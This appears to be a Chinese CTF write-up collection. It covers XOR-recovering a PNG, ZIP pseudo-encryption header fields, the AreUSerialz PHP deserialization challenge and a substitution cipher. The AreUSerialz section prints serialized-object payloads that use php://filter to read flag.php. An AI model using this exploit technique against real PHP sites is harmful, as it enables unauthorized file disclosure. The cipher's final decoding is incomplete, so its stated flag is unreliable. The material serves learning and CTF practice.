菜狗杯Misc你会异或吗? wp

题目分析

根据题目当中提到的神秘数字:0x50

![](C:\Users\29901\Pictures\Screenshots\屏幕截图 2025-02-02 231450.png)

下载文件并解压缩会得到一张png,将该图片以010editor打开,会看到:

![](C:\Users\29901\Pictures\Screenshots\屏幕截图 2025-02-02 231709.png)

我们试着根据题目的提示:

1
2
3
4
0xD9 ^ 0x50 = 0x89
0X00 ^ 0x50 = 0x50
0x1E ^ 0x50 = 0x4E
0x17 ^ 0x50 = 0x47

详细计算过程如下:

我们以0xd9 ^ 0x50 = 0x89 为例

1.将十六进制转化为二进制

2.对每一位进行异或运算

3. 将结果转换回十六进制

二进制结果10001001转换为十六进制是:0x89

最终答案

0xd9 ^ 0x50 = 0x89

其他的运算方法如上,。

综上,我们发现这不就是png文件头的特征吗,于是写个脚本:

1
2
3
4
5
6
f=open("misc5.png",'rb')
con=f.read()#二进制形式
with open('flag.png','wb') as nfile:
    for b in con:
        #这里的b是int形式,要转换成bytes时,使用bytes(),且里面的内容需要加[]
        nfile.write(bytes([b^0x50]))

就成功得到flag了。

异或(^)的性质与应用

异或(^)的性质与应用

[toc]

1.基本概念

1.1 符号

异或(Exclusive OR,简称 XOR)是一种数学运算符,常用于逻辑运算与计算机中的位运算,异或运算可以通过数学符号“⊕”表示。

1.2 运算规则

当且仅当两个输入值不同时,异或运算输出为真(1),否则输出为假(0),即“同为 0,异为 1”。即

1 ^ 1= 0

0 ^ 0 = 0

1 ^ 0 = 1

由运算规则可知,任何二进制数与零异或都会等于其本身,即 A ^ 0 = A。

1.3 异或性质

异或运算具有交换律、结合律、恒等律等性质。

(1)交换律: A ^ B = B ^ A

(2)结合律: ( A ^ B ) ^ C = A ^ ( B ^ C )

(3)自反性: A ^ B ^ B = A (由结合律可推: A ^ B ^ B = A ^ ( B ^ B ) = A ^ 0 = A)

2.异或应用

2.1 变量交换

实例,将a和b两个变量值交换,例如:a=3,b=7,交换后,a=7,b=3。

1
2
3
4
5
6
7
8
9
// 常规方法
int temp = a; // temp = 3
a = b;        // a = 7
b = temp;     // b = 3

// 异或方法
a = a ^ b;    // a = 3 ^ 7
b = a ^ b;    // b = (3 ^ 7) ^ 7 = 3 ^ (7 ^ 7) =3
a = a ^ b;    // a = (3 ^ 7) ^ 3 = (3 ^ 3) ^ 7 =7

zip伪加密学习

zip伪加密学习,压缩包16进制数据含义分析

一个zip文件由三部分组成:

1.压缩源文件数据区

2.压缩源文件目录区

3.压缩源文件目录结束标志

在ctf.show当中_萌新杂项6中的压缩包为例,用010 editor打开。

如下图中,

前面的灰色背景的十六进制数字为压缩源文件数据区

中间紫色背景的十六进制数字为压缩源文件目录区

后面的黄色背景的十六进制数字为压缩源文件目录结束标志

![](C:\Users\29901\Pictures\Screenshots\屏幕截图 2025-01-26 172336.png)


本次将着重介绍压缩源文件目录区

50 4B 01 02:目录中文件文件头标记

![](C:\Users\29901\Pictures\Screenshots\屏幕截图 2025-01-26 172336.png)


1F 00:压缩使用的pkware版本

![](C:\Users\29901\Pictures\Screenshots\屏幕截图 2025-01-26 172519.png)


14 00:解压文件所需的pkware版本

![](C:\Users\29901\Pictures\Screenshots\屏幕截图 2025-01-26 172530.png)


此处是伪加密应该将09改为00

00 00:全局方式位标记(有无加密,伪加密的关键)目录文件头标记后4bytes

![](C:\Users\29901\Pictures\Screenshots\屏幕截图 2025-01-26 172547.png)


08 00:压缩方式

![](C:\Users\29901\Pictures\Screenshots\屏幕截图 2025-01-26 172602.png)


DC 01:最后修改文件的时间

![](C:\Users\29901\Pictures\Screenshots\屏幕截图 2025-01-26 172613.png)


53 50:最后修改文件日期

![](C:\Users\29901\Pictures\Screenshots\屏幕截图 2025-01-26 172628.png)


D0 EB AE BF:CRC-32校验

![](C:\Users\29901\Pictures\Screenshots\屏幕截图 2025-01-26 172650.png)


15 00 00 00:压缩后尺寸

![](C:\Users\29901\Pictures\Screenshots\屏幕截图 2025-01-26 172702.png)


13 00 00 00:未压缩尺寸

![](C:\Users\29901\Pictures\Screenshots\屏幕截图 2025-01-26 172714.png)


08 00:文件名长度

![](C:\Users\29901\Pictures\Screenshots\屏幕截图 2025-01-26 172725.png)


24 00:扩展字段长度

![](C:\Users\29901\Pictures\Screenshots\屏幕截图 2025-01-26 172734.png)


00 00 :文件注释长度

![](C:\Users\29901\Pictures\Screenshots\屏幕截图 2025-01-26 172750.png)


00 00 :磁盘开始号

![](C:\Users\29901\Pictures\Screenshots\屏幕截图 2025-01-26 172800.png)


00 00:内部文件属性

![](C:\Users\29901\Pictures\Screenshots\屏幕截图 2025-01-26 172816.png)


20 00 00 00:外部文件属性

![](C:\Users\29901\Pictures\Screenshots\屏幕截图 2025-01-26 172827.png)


00 00 00 00:局部头部偏移量

![](C:\Users\29901\Pictures\Screenshots\屏幕截图 2025-01-26 172842.png)

AreUSerialz

[网鼎杯 2020 青龙组]AreUSerialz 解题思路&过程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

is_valid()函数对传入的字符串进行判断,确保每一个字符ASCII码值都在32-125,即该函数的作用是确保参数字符串的每一个字符都是可打印的,才返回true。

1
2
3
4
5
6
7
if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

该段代码首先通过get方法获得字符串str,若str中没有不可打印的字符串后,对字符串执行反序列化操作。因此我们再看一遍FileHandler类中的内容。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

于是我们发现,若想读取flag,需要绕过process()方法的判断,防止op被置一。于是可以传入一个数字2,绕过process()方法的判断。于是我们构造payload:

1
2
3
4
5
6
7
8
9
10
11
12
<?php
highlight_file(__FILE__);
	class FileHandler {
        protected $op = 2;
        protected $filename = "php://filter/read=convert.base64-encode/resource=d:\\phpstudy_pro\\WWW\\flag.php";
        protected $content;
    }
    $a = new FileHandler();
        $b = serialize($a);
        echo($b);
?>

利用以下payload可以读到flag。

1
2
3
4
5
6
7
8
9
10
11
12
<?php
highlight_file(__FILE__);
	class FileHandler {
        public $op = 2;
        public $filename = "php://filter/read=convert.base64-encode/resource=flag.php";
        public $content;
    }
    $a = new FileHandler();
        $b = serialize($a);
        echo($b);
?>

破译

2016全国大学生信息安全竞赛

一、题目

破译以下密文:

1
2
 TW5650Y - 0TS UZ50S S0V LZW UZ50WKW 9505KL4G 1X WVMUSL510 S001M0UWV 910VSG S0 WFLW0K510 1X LZW54 WF5KL50Y 2S4L0W4KZ52 L1 50U14214SLW X5L0WKK S0V TSK7WLTS88 VWNW8129W0L 50 W8W9W0LS4G, 95VV8W S0V Z5YZ KUZ118K SU41KK UZ50S.LZW S001M0UW9W0L ESK 9SVW SL S K5Y050Y UW4W910G L1VSG TG 0TS UZ50S UW1 VSN5V KZ1W9S7W4 S0V FM LS1, V54WUL14 YW0W4S8 1X LZW 50LW40SL510S8 U112W4SL510 S0V WFUZS0YW VW2S4L9W0L 1X LZW 9505KL4G 1X WVMUSL510.
"EW S4W WFU5LWV L1 T41SVW0 1M4 2S4L0W4KZ52 E5LZ LZW 9505KL4G 1X WVMUSL510 L1 9S7W S 810Y-8SKL50Y 592SUL 10 LZW 85NWK 1X UZ50WKW KLMVW0LK LZ41MYZ S 6150L8G-VWK5Y0WV TSK7WLTS88 UM445UM8M9 S0V S E5VW 4S0YW 1X KUZ118 TSK7WLTS88 241Y4S9K," KS5V KZ1W9S7W4. "LZ5K U1995L9W0L 9S47K S01LZW4 958WKL10W 50 LZW 0TS'K G1MLZ S0V TSK7WLTS88 VWNW8129W0L WXX14LK 50 UZ50S." X8SY { YK182V9ZUL9STU5V}

二、 Write up

1.我们仔细观察可以发现末尾的代码,很想flag的形式

1
X8SY { YK182V9ZUL9STU5V}

我们假设X8SY对应的是FLAG,即X-F,8-L,S-A,Y-G。

可以总结为简单的凯撒移位密码,‘X’到‘F’位移了18.

先替换,得到结果:

1
2
3
BE5650G - 0BA CH50A A0D THE CH50ESE 9505ST4O 1F EDUCAT510 A001U0CED 910DAO A0 ENTE0S510 1F THE54 EN5ST50G 2A4T0E4SH52 T1 50C14214ATE F5T0ESS A0D BAS7ETBA88 DEVE8129E0T 50 E8E9E0TA4O, 95DD8E A0D H5GH SCH118S AC41SS CH50A.THE A001U0CE9E0T MAS 9ADE AT A S5G050G CE4E910O T1DAO BO 0BA CH50A CE1 DAV5D SH1E9A7E4 A0D NU TA1, D54ECT14 GE0E4A8 1F THE 50TE40AT510A8 C112E4AT510 A0D ENCHA0GE DE2A4T9E0T 1F THE 9505ST4O 1F EDUCAT510.
"ME A4E ENC5TED T1 B41ADE0 1U4 2A4T0E4SH52 M5TH THE 9505ST4O 1F EDUCAT510 T1 9A7E A 810G-8AST50G 592ACT 10 THE 85VES 1F CH50ESE STUDE0TS TH41UGH A 6150T8O-DES5G0ED BAS7ETBA88 CU445CU8U9 A0D A M5DE 4A0GE 1F SCH118 BAS7ETBA88 241G4A9S," SA5D SH1E9A7E4. "TH5S C1995T9E0T 9A47S A01THE4 958EST10E 50 THE 0BA'S O1UTH A0D BAS7ETBA88 DEVE8129E0T EFF14TS 50 CH50A." F8AG { GS182D9HCT9ABC5D}

2.尝试替换数字8

1
2
3
BE5650G - 0BA CH50A A0D THE CH50ESE 9505ST4O 1F EDUCAT510 A001U0CED 910DAO A0 ENTE0S510 1F THE54 EN5ST50G 2A4T0E4SH52 T1 50C14214ATE F5T0ESS A0D BAS7ETBALL DEVEL129E0T 50 ELE9E0TA4O, 95DDLE A0D H5GH SCH11LS AC41SS CH50A.THE A001U0CE9E0T MAS 9ADE AT A S5G050G CE4E910O T1DAO BO 0BA CH50A CE1 DAV5D SH1E9A7E4 A0D NU TA1, D54ECT14 GE0E4AL 1F THE 50TE40AT510AL C112E4AT510 A0D ENCHA0GE DE2A4T9E0T 1F THE 9505ST4O 1F EDUCAT510.
"ME A4E ENC5TED T1 B41ADE0 1U4 2A4T0E4SH52 M5TH THE 9505ST4O 1F EDUCAT510 T1 9A7E A L10G-LAST50G 592ACT 10 THE L5VES 1F CH50ESE STUDE0TS TH41UGH A 6150TLO-DES5G0ED BAS7ETBALL CU445CULU9 A0D A M5DE 4A0GE 1F SCH11L BAS7ETBALL 241G4A9S," SA5D SH1E9A7E4. "TH5S C1995T9E0T 9A47S A01THE4 95LEST10E 50 THE 0BA'S O1UTH A0D BAS7ETBALL DEVEL129E0T EFF14TS 50 CH50A." FLAG { GS1L2D9HCT9ABC5D}```

3.继续观察,尝试替换数字0

根据出现的A0D、STUDE0TS,猜测并替换0为N。

1
2
3
BE565NG - NBA CH5NA AND THE CH5NESE 95N5ST4O 1F EDUCAT51N ANN1UNCED 91NDAO AN ENTENS51N 1F THE54 EN5ST5NG 2A4TNE4SH52 T1 5NC14214ATE F5TNESS AND BAS7ETBALL DEVEL129ENT 5N ELE9ENTA4O, 95DDLE AND H5GH SCH11LS AC41SS CH5NA.THE ANN1UNCE9ENT MAS 9ADE AT A S5GN5NG CE4E91NO T1DAO BO NBA CH5NA CE1 DAV5D SH1E9A7E4 AND NU TA1, D54ECT14 GENE4AL 1F THE 5NTE4NAT51NAL C112E4AT51N AND ENCHANGE DE2A4T9ENT 1F THE 95N5ST4O 1F EDUCAT51N.
"ME A4E ENC5TED T1 B41ADEN 1U4 2A4TNE4SH52 M5TH THE 95N5ST4O 1F EDUCAT51N T1 9A7E A L1NG-LAST5NG 592ACT 1N THE L5VES 1F CH5NESE STUDENTS TH41UGH A 615NTLO-DES5GNED BAS7ETBALL CU445CULU9 AND A M5DE 4ANGE 1F SCH11L BAS7ETBALL 241G4A9S," SA5D SH1E9A7E4. "TH5S C1995T9ENT 9A47S AN1THE4 95LEST1NE 5N THE NBA'S O1UTH AND BAS7ETBALL DEVEL129ENT EFF14TS 5N CH5NA." FLAG { GS1L2D9HCT9ABC5D}

4.尝试替换数字5

根据文中出现的CH5NA、CH5NESE、F5TNESS,猜测并替换5为字母I。

1
2
3
BEI6ING - NBA CHINA AND THE CHINESE 9INIST4O 1F EDUCATI1N ANN1UNCED 91NDAO AN ENTENSI1N 1F THEI4 ENISTING 2A4TNE4SHI2 T1 INC14214ATE FITNESS AND BAS7ETBALL DEVEL129ENT IN ELE9ENTA4O, 9IDDLE AND HIGH SCH11LS AC41SS CHINA.THE ANN1UNCE9ENT MAS 9ADE AT A SIGNING CE4E91NO T1DAO BO NBA CHINA CE1 DAVID SH1E9A7E4 AND NU TA1, DI4ECT14 GENE4AL 1F THE INTE4NATI1NAL C112E4ATI1N AND ENCHANGE DE2A4T9ENT 1F THE 9INIST4O 1F EDUCATI1N.
"ME A4E ENCITED T1 B41ADEN 1U4 2A4TNE4SHI2 MITH THE 9INIST4O 1F EDUCATI1N T1 9A7E A L1NG-LASTING I92ACT 1N THE LIVES 1F CHINESE STUDENTS TH41UGH A 61INTLO-DESIGNED BAS7ETBALL CU44ICULU9 AND A MIDE 4ANGE 1F SCH11L BAS7ETBALL 241G4A9S," SAID SH1E9A7E4. "THIS C199IT9ENT 9A47S AN1THE4 9ILEST1NE IN THE NBA'S O1UTH AND BAS7ETBALL DEVEL129ENT EFF14TS IN CHINA." FLAG { GS1L2D9HCT9ABCID}

5.尝试替换数字9为M

1
2
3
BEI6ING - NBA CHINA AND THE CHINESE MINIST4O 1F EDUCATI1N ANN1UNCED M1NDAO AN ENTENSI1N 1F THEI4 ENISTING 2A4TNE4SHI2 T1 INC14214ATE FITNESS AND BAS7ETBALL DEVEL12MENT IN ELEMENTA4O, MIDDLE AND HIGH SCH11LS AC41SS CHINA.THE ANN1UNCEMENT MAS MADE AT A SIGNING CE4EM1NO T1DAO BO NBA CHINA CE1 DAVID SH1EMA7E4 AND NU TA1, DI4ECT14 GENE4AL 1F THE INTE4NATI1NAL C112E4ATI1N AND ENCHANGE DE2A4TMENT 1F THE MINIST4O 1F EDUCATI1N.
"ME A4E ENCITED T1 B41ADEN 1U4 2A4TNE4SHI2 MITH THE MINIST4O 1F EDUCATI1N T1 MA7E A L1NG-LASTING IM2ACT 1N THE LIVES 1F CHINESE STUDENTS TH41UGH A 61INTLO-DESIGNED BAS7ETBALL CU44ICULUM AND A MIDE 4ANGE 1F SCH11L BAS7ETBALL 241G4AMS," SAID SH1EMA7E4. "THIS C1MMITMENT MA47S AN1THE4 MILEST1NE IN THE NBA'S O1UTH AND BAS7ETBALL DEVEL12MENT EFF14TS IN CHINA." FLAG { GS1L2DMHCTMABCID}

6.最后替换数字1.2.4,得到答案

1
2
3
EI6ING - NBA CHINA AND THE CHINESE MINISTRO OF EDUCATION ANNOUNCED MONDAO AN ENTENSION OF THEIR ENISTING PARTNERSHIP TO INCORPORATE FITNESS AND BAS7ETBALL DEVELOPMENT IN ELEMENTARO, MIDDLE AND HIGH SCHOOLS ACROSS CHINA.THE ANNOUNCEMENT MAS MADE AT A SIGNING CEREMONO TODAO BO NBA CHINA CEO DAVID SHOEMA7ER AND NU TAO, DIRECTOR GENERAL OF THE INTERNATIONAL COOPERATION AND ENCHANGE DEPARTMENT OF THE MINISTRO OF EDUCATION.
"ME ARE ENCITED TO BROADEN OUR PARTNERSHIP MITH THE MINISTRO OF EDUCATION TO MA7E A LONG-LASTING IMPACT ON THE LIVES OF CHINESE STUDENTS THROUGH A 6OINTLO-DESIGNED BAS7ETBALL CURRICULUM AND A MIDE RANGE OF SCHOOL BAS7ETBALL PROGRAMS," SAID SHOEMA7ER. "THIS COMMITMENT MAR7S ANOTHER MILESTONE IN THE NBA'S OOUTH AND BAS7ETBALL DEVELOPMENT EFFORTS IN CHINA." FLAG { GSOLPDMHCTMABCID}